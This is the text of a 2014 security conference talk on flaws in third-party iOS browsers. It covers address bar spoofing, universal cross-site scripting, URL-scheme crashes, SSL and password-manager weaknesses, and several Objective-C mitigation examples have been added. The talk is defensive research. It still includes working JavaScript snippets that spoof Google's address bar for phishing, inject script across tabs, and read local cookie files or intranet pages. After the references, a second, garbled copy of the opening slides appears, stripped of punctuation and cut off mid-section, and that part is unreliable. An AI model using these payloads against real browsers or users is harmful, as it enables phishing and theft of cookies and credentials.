Mobile Browsers Security: iOS
Łukasz Pilorz, Paweł Wyleciał
SyScan360 2014
This presentation expresses our private opinions.
The sample attacks against Google and PayPal users demonstrated in this presentation
are based on vulnerabilities in the browsers, not in these websites.
Łukasz Pilorz, Paweł Wyleciał
Thank you: Marek Zmysłowski, Aleksander Droś
In this presentation
• iOS Browsers: UIWebView, WKWebView
• Address Bar Spoofing
• Universal Cross-Site Scripting
• Popups & URL handling
• SSL & password managers
iOS Browsers
iOS Browser == Mobile Safari
• iOS App Store Review Guidelines: „Apps that browse the web must use the iOS WebKit framework and WebKit Javascript”
Introduction: iOS Browsers
WebView-based / Proxy-rendering
iOS Third-Party Browsers
> 60 browsers in App Store
UIWebView & WKWebView
UIWebView API
• loadRequest:
• loadHTMLString:baseURL:
• loadData:MIMEType:textEncodingName:baseURL:
• goBack / goForward / stopLoading / reload
• request (read-only)
UIWebView API
• stringByEvaluatingJavaScriptFromString: runs in the origin of the currently loaded request.mainDocumentURL
No access to subframes from a domain other than the top document:
top document: http://example.com/
subframe: http://hidden.tld/
JavaScript is used to implement browser features and to override native functions to bridge them with Objective-C code.
UIWebViewDelegate
• webView:shouldStartLoadWithRequest:navigationType:
• webViewDidStartLoad:
• webViewDidFinishLoad:
• webView:didFailLoadWithError:
iOS 8 beta: WKWebView
• configuration.preferences
• configuration.userContentController
• navigationDelegate
• UIDelegate
• URL (KVO)
• hasOnlySecureContent (KVO)
Bolted-on by the browsers
• Address bar
• Multiple tabs
• Downloads
• Support for untrusted SSL certificates
• Autocomplete & password manager
• … and many more features (safety ratings, malware protection, cloud integration, …)
Testing
• Inspiration from Browser Security Handbook
• Retesting previous Mobile Safari bugs
• "Black-box" testing from web perspective, review of JavaScript code, a bit of reversing/debugging
• Cross-browser test cases: https://ios.browsr-tests.com/
Address Bar Spoofing
Look-alike: IDN etc.
URL tracking desynchronization
• Navigate to untracked content
• Initiate navigation, interrupt, overwrite content
• Failed navigation
• Loading loop
• Lots of other methods (race conditions, history, …)
• Most of them known for over 10 years (IE, Netscape)
Address Bar Spoofing: Untracked Content
Replace window content with untracked content.
document.write and/or data: URIs are usually good candidates.
• w = window.open('https://accounts.google.com/'); setTimeout(function(){ w.document.write(…) }, …);
• CVE-2013-5152 Mobile Safari Address Bar Spoofing: reported in iOS 5.1.1, fixed in iOS 7
Address Bar Spoofing: Init & Interrupt
Initialise window with target URL, replace with phishing content before it loads.
• w = window.open('https://accounts.google.com/'); w.document.write(…);
Optionally fall back to native window.open:
• delete window.open; w = window.open('https://accounts.google.com/'); w.document.write(…);
• CVE-2013-6895 Kaspersky Safe Browser
• CVE-2013-6898 F-Secure Safe Browser
• CVE-2013-6897 Dolphin Browser
• … and 45% of tested browsers
• Special guest star: Google Chrome for Android, CVE-2013-6642
Bug Bounty :-)
Address Bar Spoofing: Failed Navigation
Incorrect URL often remains in address bar after navigation errors:
• DNS NXDOMAIN - host not found (https://login.target.tld/)
• TCP port closed (https://www.target.tld:448/)
• SSL errors (https://target.tld/)
• Display phishing page, then redirect to "incorrect" URL
• Mobile Safari before iOS 7: window.focus() or window.open().close() allowed suppressing error alerts
Address Bar Spoofing: Loading loop
• HTTP request timeout in iOS browsers is usually between 1 and 10 minutes
• Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt, even before an actual connection is made
• Now we only need to find a target with filtered port 443
• Or any filtered port, because Mobile Safari shows only the hostname part of the URL
• document.write('Phishing page here'); location = 'https://accounts.google.com:8443/'; setInterval(function(){ location = 'https://accounts.google.com:8443/' }, …);
Phishing page with a spoofed title bar:
<title>https://www.apple.com/</title>
Address bar tips
• Display the URL that is currently loaded within UIWebView, not the one you think will be there
• UIWebViewDelegate: update address bar on each event, including webView:didFailLoadWithError:
• Displaying SSL lock makes sense if there was an actual successful and valid SSL connection. Spoofing https URL seems easy, don't make it worse by automatically adding SSL lock
• iOS 8: KVO-compliant WKWebView.URL property
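The address bar tips above, as an added example written for this page (it is not code from the slides or from any of the browsers discussed): a UIWebViewDelegate that re-reads the view's own request on every callback, including the failure callback, and the iOS 8 variant that drives the bar and the lock icon from WKWebView's KVO-compliant URL and hasOnlySecureContent properties. The class names AddressBarController and SecureAddressBarObserver and the addressField/lockIcon UI elements are assumptions.

```objectivec
// Added example, not code from the slides or from any browser discussed there.
// Assumed names: AddressBarController, addressField, lockIcon, SecureAddressBarObserver.
#import <UIKit/UIKit.h>
#import <WebKit/WebKit.h>

@interface AddressBarController : NSObject <UIWebViewDelegate>
@property (nonatomic, strong) UITextField *addressField; // assumed UI element
@property (nonatomic, strong) UIImageView *lockIcon;     // assumed UI element
@end

@implementation AddressBarController

// Show what the view actually holds: request.mainDocumentURL is the top
// document currently loaded, not the URL a script asked for a moment ago.
- (void)syncAddressBarWithWebView:(UIWebView *)webView {
    NSURL *current = webView.request.mainDocumentURL;
    self.addressField.text = current.absoluteString ?: @"";
    // UIWebView exposes no certificate state. A lock derived from the "https"
    // prefix alone is decoration, so it stays hidden unless the browser's own
    // network layer has confirmed a valid TLS session for this document.
    self.lockIcon.hidden = YES;
}

- (BOOL)webView:(UIWebView *)webView
    shouldStartLoadWithRequest:(NSURLRequest *)request
                navigationType:(UIWebViewNavigationType)navigationType {
    // Nothing has loaded yet, so this is the wrong place to write the bar:
    // a navigation that never connects would leave the new URL on screen.
    return YES;
}

- (void)webViewDidStartLoad:(UIWebView *)webView  { [self syncAddressBarWithWebView:webView]; }
- (void)webViewDidFinishLoad:(UIWebView *)webView { [self syncAddressBarWithWebView:webView]; }

// The callback most bolted-on address bars forget: after NXDOMAIN, a closed
// port or a TLS error, re-read the view instead of leaving the bar as it was.
- (void)webView:(UIWebView *)webView didFailLoadWithError:(NSError *)error {
    [self syncAddressBarWithWebView:webView];
}
@end

// iOS 8: WKWebView publishes URL and hasOnlySecureContent through KVO, so the
// bar and the lock can be driven from WebKit's own state.
@interface SecureAddressBarObserver : NSObject
@property (nonatomic, strong) WKWebView *webView;
@property (nonatomic, copy) NSString *shownURL;   // what the bar displays
@property (nonatomic, assign) BOOL showLock;      // whether the lock is shown
@end

@implementation SecureAddressBarObserver
- (instancetype)initWithWebView:(WKWebView *)webView {
    if ((self = [super init])) {
        _webView = webView;
        [webView addObserver:self forKeyPath:@"URL"
                     options:NSKeyValueObservingOptionNew context:NULL];
        [webView addObserver:self forKeyPath:@"hasOnlySecureContent"
                     options:NSKeyValueObservingOptionNew context:NULL];
    }
    return self;
}

- (void)observeValueForKeyPath:(NSString *)keyPath ofObject:(id)object
                        change:(NSDictionary *)change context:(void *)context {
    WKWebView *wv = object;
    self.shownURL = wv.URL.absoluteString ?: @"";
    // Lock only when every resource of the document came over a secure
    // connection; an https scheme in the URL string is not enough on its own.
    self.showLock = [wv.URL.scheme isEqualToString:@"https"] && wv.hasOnlySecureContent;
}

- (void)dealloc {
    [_webView removeObserver:self forKeyPath:@"URL"];
    [_webView removeObserver:self forKeyPath:@"hasOnlySecureContent"];
}
@end
```

The design point is that the bar is never written from a request the browser intends to make, only from what the view reports after the fact, and that the lock is tied to WebKit's secure-content state rather than to the text of the URL.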
UXSS: Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users, bypassing same-origin policy.
In UXSS the attacker exploits vulnerability in the browser, not in the website.
(~ http://en.wikipedia.org/wiki/Cross-site_scripting)
Famous after PDF UXSS in 2007
Universal Cross-Site Scripting
• CVE-2013-6893 UXSS in Mercury Browser for iOS
• CVE-2013-7197 UXSS in Yandex.Browser for iOS
• CVE-2012-2899 UXSS in Google Chrome for iOS
• …
CVE-2013-6893: UXSS in Mercury Browser
w = window.open('about:blank');
→ mb.exec$(WINDOW_ID)[ {command: "window.open", target: 1234, "url": "about:blank"} ]   (target id: Math.random())
→ [webView loadRequest: … "about:blank" …]   (cross-frame forgery)
w.document.write('Hi');
→ mb.exec$(WINDOW_ID)[ {"command": "window.document.write", target: 1234, "html": "Hi"} ]
→ [webView stringByEvaluatingJavaScriptFromString:@"document.write('Hi')"]
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls. Any at all.
w = window.open('https://accounts.google.com/'); w.document.write('<script src=…></script>'); … and it just works in accounts.google.com
CVE-2013-7197: UXSS in Yandex.Browser
• Same-origin check implemented on window.open()
• Not rechecked on window.document.write()
• Redirect child window after window.open() → UXSS
Bug Bounty :-)
CVE-2012-2899: UXSS in Google Chrome
• w = window.open(location.href); w.document.write('Hi');
• [webView loadHTMLString:@"Hi" baseURL:href]
• w = window.open('about:blank'); w.document.write(…);
• about:blank is kind of "no URL", right?
• [webView loadHTMLString:@"…" baseURL:nil]
• For baseURL = nil, UIWebView loads applewebdata:// origin. Same as file:// - no same-origin policy, access to any web origin and local files
• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>');
• applewebdata:// origin
• UXSS + local file access (application sandbox / jailbreak)
Bug Bounty :-)
Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi');
• [webView loadHTMLString:@"Hi" baseURL:[NSURL …@"about:blank"]]
• iOS 8: use WKWebView.UIDelegate webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:
Other potential paths to applewebdata:// or file:// origin
• baseURL: [NSURL URLWithString:@"http://example.com/…"] —> nil (for strings NSURL refuses to parse)
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com/…"), NULL) —> NULL
• Downloads opened directly from file://
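The two safe-cross-tab-write slides and the "other paths to applewebdata://" slide above, combined in one added example written for this page (it is not the slides' code or any browser's). It shows the UIWebView bridge side pinning a cross-tab document.write to an about:blank base, treating a nil NSURL from untrusted input as a refusal rather than a fallback to baseURL:nil, and the iOS 8 WKUIDelegate method that lets WebKit create the popup. The class TabManager, its tabsByID/popupTabs storage and the method names are assumptions.

```objectivec
// Added example, not the slides' or any browser's own code. Assumed names:
// TabManager, tabsByID, popupTabs, writeHTML:intoTab:, loadHTML:intoTab:baseURLString:.
#import <UIKit/UIKit.h>
#import <WebKit/WebKit.h>

@interface TabManager : NSObject <WKUIDelegate>
@property (nonatomic, strong) NSMutableDictionary *tabsByID; // NSNumber tab id -> UIWebView
@property (nonatomic, strong) NSMutableArray *popupTabs;     // WKWebViews created for window.open
@end

@implementation TabManager

- (instancetype)init {
    if ((self = [super init])) {
        _tabsByID = [NSMutableDictionary dictionary];
        _popupTabs = [NSMutableArray array];
    }
    return self;
}

// UIWebView bridge handler for a cross-tab window.document.write. The base URL
// is pinned to about:blank: the written document gets a throwaway origin, never
// the opener's and never applewebdata:// (which baseURL:nil would hand it).
- (BOOL)writeHTML:(NSString *)html intoTab:(NSNumber *)targetID {
    UIWebView *target = self.tabsByID[targetID];
    if (target == nil) return NO;
    [target loadHTMLString:html baseURL:[NSURL URLWithString:@"about:blank"]];
    return YES;
}

// When the base URL itself comes from untrusted input, a nil NSURL means
// "do not load", not "fall back to nil" (CFURL's NULL is the same trap).
- (BOOL)loadHTML:(NSString *)html intoTab:(NSNumber *)targetID baseURLString:(NSString *)baseString {
    UIWebView *target = self.tabsByID[targetID];
    NSURL *base = [NSURL URLWithString:baseString];
    if (target == nil || base == nil) return NO;
    NSString *scheme = base.scheme.lowercaseString;
    if (![scheme isEqualToString:@"http"] && ![scheme isEqualToString:@"https"]) return NO;
    [target loadHTMLString:html baseURL:base];
    return YES;
}

// iOS 8: let WebKit create the popup. The supplied configuration must be used,
// so opener and popup share a process pool and WebKit, not a JS bridge,
// applies the same-origin policy to anything the opener writes into it.
- (WKWebView *)webView:(WKWebView *)webView
createWebViewWithConfiguration:(WKWebViewConfiguration *)configuration
   forNavigationAction:(WKNavigationAction *)navigationAction
        windowFeatures:(WKWindowFeatures *)windowFeatures {
    WKWebView *popup = [[WKWebView alloc] initWithFrame:webView.bounds configuration:configuration];
    popup.UIDelegate = self;
    [self.popupTabs addObject:popup];   // the browser would also add tab UI here (assumed)
    return popup;
}
@end
```

With the WKWebView path the browser no longer forges window.open through its own bridge at all, which is what removes the Mercury and Chrome style cross-tab bugs rather than patching them one call at a time.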
Content-Disposition: attachment
• displayed in the origin of hosting site (iOS < 5): CVE-2011-3426, Christian Matthies, Yoshinori Oota
• isolated attachment origin (iOS 5+)
• document.location.href
• document.referrer
• w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation');
Content-Type
• text/plain → HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream → HTML
• application/other, filename=*.html
JS without Same-Origin-Policy
<script>a = document.location.href.split('/'); if (a[0] === 'file:') { path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7]; path = path + '/Library/Cookies/Cookies.binarycookies'; x = new XMLHttpRequest(); x.open('GET', path, false); x.send(); alert(x.responseText); }</script>
<script>x = new XMLHttpRequest(); x.open('GET', 'https://your.intranet/', false); x.send(); alert(x.responseText);</script>
Challenge: Hijack password autofill
Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header, HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView.configuration.preferences.javaScriptEnabled = false
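The list above, as an added example written for this page (not code from the slides): a downloaded .html file shown either as text/plain under an about:blank base in a UIWebView, or as HTML in an iOS 8 WKWebView with JavaScript disabled and the same about:blank base, so the file never gets a file:// origin and never gets a script context that could reach other local files. The class LocalFileViewer and its two method names are assumptions.

```objectivec
// Added example, not from the slides. Assumed names: LocalFileViewer,
// showDownloadAsText:in:, webViewForDownload:frame:.
#import <UIKit/UIKit.h>
#import <WebKit/WebKit.h>

@interface LocalFileViewer : NSObject
@end

@implementation LocalFileViewer

// UIWebView: hand the bytes over as text/plain with an about:blank base. The
// document is then plain text in a throwaway origin, not markup in file://.
// (On iOS < 7 text/plain could still be sniffed into HTML, CVE-2013-5151,
// which is why the base URL is pinned as well and not left at nil.)
+ (BOOL)showDownloadAsText:(NSURL *)fileURL in:(UIWebView *)webView {
    NSError *error = nil;
    NSData *bytes = [NSData dataWithContentsOfURL:fileURL options:0 error:&error];
    if (bytes == nil) return NO;
    [webView loadData:bytes
             MIMEType:@"text/plain"
     textEncodingName:@"utf-8"
              baseURL:[NSURL URLWithString:@"about:blank"]];
    return YES;
}

// iOS 8 WKWebView: render the file as HTML, but with JavaScript off and an
// about:blank base, so a file sniffed or declared as HTML can neither run
// script nor read other local files through XMLHttpRequest.
+ (WKWebView *)webViewForDownload:(NSURL *)fileURL frame:(CGRect)frame {
    NSError *error = nil;
    NSString *html = [NSString stringWithContentsOfURL:fileURL
                                              encoding:NSUTF8StringEncoding
                                                 error:&error];
    if (html == nil) return nil;
    WKWebViewConfiguration *config = [[WKWebViewConfiguration alloc] init];
    config.preferences.javaScriptEnabled = NO;
    WKWebView *view = [[WKWebView alloc] initWithFrame:frame configuration:config];
    [view loadHTMLString:html baseURL:[NSURL URLWithString:@"about:blank"]];
    return view;
}
@end
```

Reading the file into memory and loading it as a string is deliberate: the web view is never given the file:// URL itself, so the origin it assigns is the one the browser chose, not the one the file system implies.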
Popups & URL handling
• Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
• <iframe src="googlechrome://example.com">, <iframe src="merc://example.com"> etc. bypass all popup blockers anyway…
Popup blockers: Application (bolted-on) / Native (WebKit)
URI schemes
Bridge (internal):
• scheme://download?https://secure.tld/victim/data, scheme://download?http://attacker.tld/README.html
• scheme://add-filter?url=
Registered (external)
CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause Null Pointer Dereference
• Tested with percent encoding: http://%, http://%5, http://%5c etc.
• Example: Opera Coast: <script>document.location = 'http://%5c'</script>
Opera Coast:
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()
• Special guest star: Safari on OS X Mavericks before Security Update 2014-02 (CVE-2014-1315)
<iframe src="lets-try-format-string:%p%p%p%p…">
SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept self-signed cert)
• 14% of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for main domain only (e.g. Opera Coast < 3.02)
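The SSL findings above, as an added example written for this page (not code from the talk or from any of the tested browsers): a trust decision for a browser that does let the user accept a self-signed certificate, evaluated once per challenge, i.e. per host the page pulls resources from, and keyed on the exact host and leaf-certificate fingerprint the user approved, so an approval for the main domain never covers a subresource host. The class TrustPolicy and its method names are assumptions.

```objectivec
// Added example, not code from the talk or any browser in it. Assumed names:
// TrustPolicy, approvedFingerprintsByHost, shouldTrustChallenge:, userAcceptedCertificateForHost:fingerprint:.
#import <Foundation/Foundation.h>
#import <Security/Security.h>
#import <CommonCrypto/CommonDigest.h>

// Hex SHA-256 over the DER bytes of the leaf certificate in the chain.
static NSString *LeafFingerprint(SecTrustRef trust) {
    if (SecTrustGetCertificateCount(trust) < 1) return nil;
    SecCertificateRef leaf = SecTrustGetCertificateAtIndex(trust, 0);
    CFDataRef der = SecCertificateCopyData(leaf);
    unsigned char digest[CC_SHA256_DIGEST_LENGTH];
    CC_SHA256(CFDataGetBytePtr(der), (CC_LONG)CFDataGetLength(der), digest);
    CFRelease(der);
    NSMutableString *hex = [NSMutableString stringWithCapacity:2 * CC_SHA256_DIGEST_LENGTH];
    for (int i = 0; i < CC_SHA256_DIGEST_LENGTH; i++) [hex appendFormat:@"%02x", digest[i]];
    return hex;
}

@interface TrustPolicy : NSObject
// host -> fingerprint the user explicitly accepted for that host, and only that host
@property (nonatomic, strong) NSMutableDictionary *approvedFingerprintsByHost;
@end

@implementation TrustPolicy

- (instancetype)init {
    if ((self = [super init])) _approvedFingerprintsByHost = [NSMutableDictionary dictionary];
    return self;
}

// Called for every server-trust challenge the connection layer raises. Each
// host the page loads from gets its own challenge, so nothing here is decided
// "for the main domain" and then reused for other hosts.
- (BOOL)shouldTrustChallenge:(NSURLAuthenticationChallenge *)challenge {
    if (![challenge.protectionSpace.authenticationMethod
              isEqualToString:NSURLAuthenticationMethodServerTrust]) return NO;
    SecTrustRef trust = challenge.protectionSpace.serverTrust;
    SecTrustResultType result = kSecTrustResultInvalid;
    if (SecTrustEvaluate(trust, &result) == errSecSuccess &&
        (result == kSecTrustResultUnspecified || result == kSecTrustResultProceed)) {
        return YES;   // chains to a trusted root and matches the host: the normal case
    }
    // Invalid chain: allow only if the user accepted exactly this certificate
    // for exactly this host. www.target.tld does not carry over to
    // api.target.tld, and a different certificate on the same host starts over.
    NSString *host = challenge.protectionSpace.host.lowercaseString;
    NSString *fingerprint = LeafFingerprint(trust);
    if (host == nil || fingerprint == nil) return NO;
    return [self.approvedFingerprintsByHost[host] isEqualToString:fingerprint];
}

// Record an explicit user decision; nothing is ever accepted silently.
- (void)userAcceptedCertificateForHost:(NSString *)host fingerprint:(NSString *)fingerprint {
    if (host && fingerprint) self.approvedFingerprintsByHost[host.lowercaseString] = fingerprint;
}
@end
```

From the connection delegate, a YES maps to `[challenge.sender useCredential:[NSURLCredential credentialForTrust:trust] forAuthenticationChallenge:challenge]` and a NO to `[challenge.sender cancelAuthenticationChallenge:challenge]`; the address bar's lock should follow the same decision and never be shown for a connection that only passed through the user-approval branch.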
Password managers
• JavaScript with privileges of top frame —> passwords not filled for subframes
• Usually possible to force saving password for another domain (with/without user interaction)
• Password filling checks for domain, but not always for URL scheme (https vs http)
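The three password-manager findings above, as an added example written for this page (it is not code from any browser in the talk): credentials are saved and matched on the full origin (scheme, host and effective port) rather than the host alone, and the fill decision refuses any request whose URL is not the main document, which is the subframe case the injected top-frame JavaScript would otherwise expose. The class PasswordAutofill, its storage and method names are assumptions.

```objectivec
// Added example, not code from any browser in the talk. Assumed names:
// PasswordAutofill, savedCredentialsByOrigin, saveUsername:forDocumentURL:, usernameToFillForRequest:.
#import <Foundation/Foundation.h>

// scheme://host:port with the default port made explicit, so that
// http://bank.tld, https://bank.tld and https://bank.tld:8443 are three origins.
static NSString *OriginForURL(NSURL *url) {
    NSString *scheme = url.scheme.lowercaseString;
    NSString *host = url.host.lowercaseString;
    if (scheme == nil || host == nil) return nil;
    NSInteger port = url.port ? url.port.integerValue
                              : ([scheme isEqualToString:@"https"] ? 443 : 80);
    return [NSString stringWithFormat:@"%@://%@:%ld", scheme, host, (long)port];
}

@interface PasswordAutofill : NSObject
@property (nonatomic, strong) NSMutableDictionary *savedCredentialsByOrigin; // origin -> username
@end

@implementation PasswordAutofill

- (instancetype)init {
    if ((self = [super init])) _savedCredentialsByOrigin = [NSMutableDictionary dictionary];
    return self;
}

// Save under the full origin of the document the form was on, not its host.
- (void)saveUsername:(NSString *)username forDocumentURL:(NSURL *)url {
    NSString *origin = OriginForURL(url);
    if (origin) self.savedCredentialsByOrigin[origin] = username;
}

// Decide before injecting the fill script from webViewDidFinishLoad:.
// Returns the username to fill, or nil to fill nothing.
- (NSString *)usernameToFillForRequest:(NSURLRequest *)request {
    NSURL *url = request.URL;
    // 1. Top document only: a subframe request has a URL different from
    //    mainDocumentURL, and the injected JS runs with top-frame privileges.
    if (request.mainDocumentURL &&
        ![request.mainDocumentURL.absoluteString isEqualToString:url.absoluteString]) return nil;
    // 2. Scheme and port are part of the match: a credential saved on
    //    https://bank.tld is never offered to http://bank.tld.
    NSString *origin = OriginForURL(url);
    if (origin == nil) return nil;
    return self.savedCredentialsByOrigin[origin];
}
@end
```

The save path matters as much as the fill path: when the stored key is the origin of the document that actually contained the form, a page on another domain cannot "force saving" a credential under the victim's key.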
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd party iOS browsers are experimental or side projects, built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com/
• https://ios.browsr-tests.com/
Questions?
lukasz.pilorz@runic.pl, pawel.wylecial@gmail.com
Twitter: @runicpl, @h0wlu
Thank you
![Page 2: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/2.jpg)
This presentation expresses our private opinions
The sample attacks against Google and PayPal users demonstrated in this presentation
are based on vulnerabilities in the browsers not in these websites
Mobile Browsers Security iOS
Łukasz Pilorz Paweł Wyleciał
Thank you Marek Zmysłowski Aleksander Droś
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
iOS Browsers
iOS Browsers
iOS Browser == Mobile Safari
bull iOS App Store Review GuidelinesbdquoApps that browse the web must use the iOS WebKit framework and WebKit Javascriptrdquo
Introduction iOS Browsers
WebView-based Proxy-rendering
iOS Third-Party Browsers
gt 60 browsers in App Store
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
